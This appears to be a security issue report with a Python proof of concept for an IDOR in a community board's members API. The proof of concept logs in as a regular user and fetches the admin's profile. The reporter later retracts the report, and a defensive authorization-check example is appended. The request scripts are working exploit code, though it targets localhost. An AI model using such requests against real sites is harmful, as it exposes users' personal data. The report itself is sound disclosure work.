## Summary
An **IDOR (Insecure Direct Object Reference)** vulnerability exists in the endpoint `/api/v1/members/{mb_id}` which allows **any authenticated user** to retrieve **arbitrary user profile information**, including administrator accounts, by simply modifying the `mb_id` path parameter.
This constitutes a serious **vertical privilege escalation (CWE-269, CWE-284)** and **sensitive information disclosure (CWE-200)**.
## Step-by-Step Reproduction (PoC)
### 1. Register and log in as a regular user to obtain JWT access token
```python
import requests

url = "http://localhost:8000/api/v1/token"
credentials = {
    "username": "test",  # username of the regular (non-admin) account
    "password": "1234"
}
# Credentials are sent form-encoded (data=), as the token endpoint is called in this PoC
res = requests.post(url, data=credentials)
if res.status_code == 200:
    token_data = res.json()
    access_token = token_data.get("access_token")
    refresh_token = token_data.get("refresh_token")
    print("[+] Access Token:", access_token)
    print("[+] Refresh Token:", refresh_token)
else:
    print(f"[!] 로그인 실패: {res.status_code}")
    print(res.text)
```
### 2. Use that regular user's token to access admin profile
```python
import requests

access_token = "<access token from step 1>"
target_mb_id = "admin"  # mb_id of a different member; the token belongs to "test"
url = f"http://localhost:8000/api/v1/members/{target_mb_id}"
headers = {
    "Authorization": f"Bearer {access_token}"
}
res = requests.get(url, headers=headers)
print(f"[+] Status: {res.status_code}")
print(res.text)
```
### Vulnerable Response:
```json
{"mb_id":"admin","mb_nick":"최고관리자","mb_email":"admin@your-domain.com","mb_point":100,"mb_profile":"","mb_icon_path":"/static/img/no_profile.gif","mb_image_path":"/static/img/no_profile.gif","mb_1":"","mb_2":"","mb_3":"","mb_4":"","mb_5":"","mb_6":"","mb_7":"","mb_8":"","mb_9":"","mb_10":""}
```
## Impact
* Any authenticated user can access **any other user's profile**, including admin.
* Disclosed data includes **email, nickname, points**, and potentially more.
* Reflects **improper access control** and **vertical privilege escalation**.
## CWE References
* **CWE-269**: Improper Privilege Management
* **CWE-284**: Improper Access Control
* **CWE-200**: Exposure of Sensitive Information to an Unauthorized Actor
1 comment
oxqnd
4 months ago
I reported this issue without checking the mb_open (profile visibility) setting for the account.
I apologize for the confusion, and I will close this issue.
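The report only shows the client side. As an added example (not Gnuboard's own code), this is the object-level authorization check a defender would expect behind `GET /api/v1/members/{mb_id}`: the decision is made against the target record and honours the mb_open visibility flag the comment refers to. The `Member` model, `ADMIN_LEVEL`, the field split and the meaning of `mb_open` are assumptions.

```python
from dataclasses import dataclass

# Constructed model: Gnuboard's real member schema, level values and mb_open
# semantics are assumptions here, not taken from the project.
@dataclass
class Member:
    mb_id: str
    mb_nick: str
    mb_email: str
    mb_point: int
    mb_level: int   # assumed: 10 = administrator
    mb_open: bool   # assumed: True = member opted into a public profile

ADMIN_LEVEL = 10
PUBLIC_FIELDS = ("mb_id", "mb_nick", "mb_point")  # shown to any permitted viewer
PRIVATE_FIELDS = ("mb_email",)                    # owner and administrators only

class Forbidden(Exception):
    """Requester may not view the target profile."""

def profile_view(requester: Member, target: Member) -> dict:
    """Object-level check for GET /api/v1/members/{mb_id}: the decision is
    made against the target record, not merely the presence of a valid token.
    Owner/admin get the full record; others get public fields only, and only
    when the target opted in via mb_open."""
    is_owner = requester.mb_id == target.mb_id
    is_admin = requester.mb_level >= ADMIN_LEVEL
    if is_owner or is_admin:
        return {k: getattr(target, k) for k in PUBLIC_FIELDS + PRIVATE_FIELDS}
    if not target.mb_open:
        raise Forbidden(f"profile of {target.mb_id!r} is not public")
    return {k: getattr(target, k) for k in PUBLIC_FIELDS}

# Constructed fixture: a regular user and an administrator whose profile is closed.
MEMBERS = {
    "test": Member("test", "tester", "test@example.invalid", 0, 2, True),
    "admin": Member("admin", "최고관리자", "admin@example.invalid", 100, 10, False),
}

def handle_get_member(requester_id: str, mb_id: str) -> tuple:
    """Stand-in for the route handler; returns (HTTP status, JSON body)."""
    requester, target = MEMBERS.get(requester_id), MEMBERS.get(mb_id)
    if requester is None:
        return 401, {"detail": "not authenticated"}
    if target is None:
        return 404, {"detail": "member not found"}
    try:
        return 200, profile_view(requester, target)
    except Forbidden as exc:
        return 403, {"detail": str(exc)}
```

Answering 403 for a closed profile and 404 for a missing one still lets a caller tell which mb_id values exist; collapse both to 404 if member enumeration is a concern for the deployment.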